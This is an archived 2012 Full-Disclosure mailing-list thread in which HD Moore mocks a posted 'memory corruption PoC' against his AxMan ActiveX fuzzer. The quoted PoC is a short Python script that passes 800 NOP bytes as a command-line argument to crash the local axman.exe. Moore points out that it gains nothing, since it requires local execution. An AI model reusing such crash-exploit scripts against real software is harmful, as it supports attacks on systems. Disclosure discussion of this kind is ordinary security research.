[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <014801cd6f2f$d62f42e0$828dc8a0$@digitaloffense.net>
Date: Tue, 31 Jul 2012 10:19:08 -0500
From: "HD Moore" <hdm@...italoffense.net>
To: "'kaveh ghaemmaghami'" <kavehghaemmaghami@...glemail.com>,
<full-disclosure@...ts.grok.org.uk>
Subject: Re: AxMan ActiveX fuzzing <== Memory Corruption
PoC
In other news, running local commands grants code execution :)
I am surprised you didn't allocate a CVE,
-HD
-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of kaveh
ghaemmaghami
Sent: Saturday, July 28, 2012 7:21 PM
To: full-disclosure@...ts.grok.org.uk
Subject: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
Crash : http://imageshack.us/f/217/axman.jpg/
Date: July 28, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://digitaloffense.net/tools/axman/
version : 1.0.0
Tested on: windows 7 SP1
========================================================
Crash The Exploiter
Lame HD Moore fuzzer Memory Corruption
By Awsome coolkaveh
----------------------------------------------------------------------------
---------------------------
import os
import win32api
crash = " Crash The Exploiter "
lame=" Lame HD Moore fuzzer Memory corruption "
awsome=" By Awsome coolkaveh "
print
print
print
print crash
print
print lame
print
print awsome
print
print
print
print
exploit = ("\x90" *800)
win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists